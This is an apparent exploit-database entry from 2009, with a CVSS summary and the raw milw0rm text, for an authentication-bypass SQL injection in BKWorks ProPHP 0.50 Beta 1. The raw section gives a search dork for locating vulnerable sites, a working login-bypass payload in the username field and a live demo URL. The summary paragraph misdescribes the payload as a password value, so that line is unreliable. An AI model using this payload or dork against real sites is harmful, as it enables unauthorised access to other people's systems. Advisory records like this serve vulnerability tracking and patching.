BKWorks ProPHP 0.50 Beta 1 (Auth Bypass) SQL Injection

vendor:

BKWorks ProPHP

by:

SirGod

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: BKWorks ProPHP

Affected Version From: 0.50 Beta 1

Affected Version To: 0.50 Beta 1

Patch Exists: YES

Related CWE: N/A

CPE: a:bkworks_products:bkworks_prophp

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

BKWorks ProPHP 0.50 Beta 1 (Auth Bypass) SQL Injection

A vulnerability in BKWorks ProPHP 0.50 Beta 1 allows an attacker to bypass authentication by entering 'admin' as the username and '1=1' as the password.

Mitigation:

Upgrade to the latest version of BKWorks ProPHP.

Source

Exploit-DB raw data:

#############################################################################################
[+] BKWorks ProPHP 0.50 Beta 1 (Auth Bypass) SQL Injection
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
#############################################################################################

[+] Dork : Powered by BKWorks ProPHP Version 0.50 Beta 1

[+] SQL Injection Login Bypass

- Login as :

Username : admin ' or ' 1=1

Password : anything or nothing

And you will be logged in.

- Live Demo

    http://old.bkworksproducts.info/content/products/demos/ProPHP/


#############################################################################################

# milw0rm.com [2009-01-11]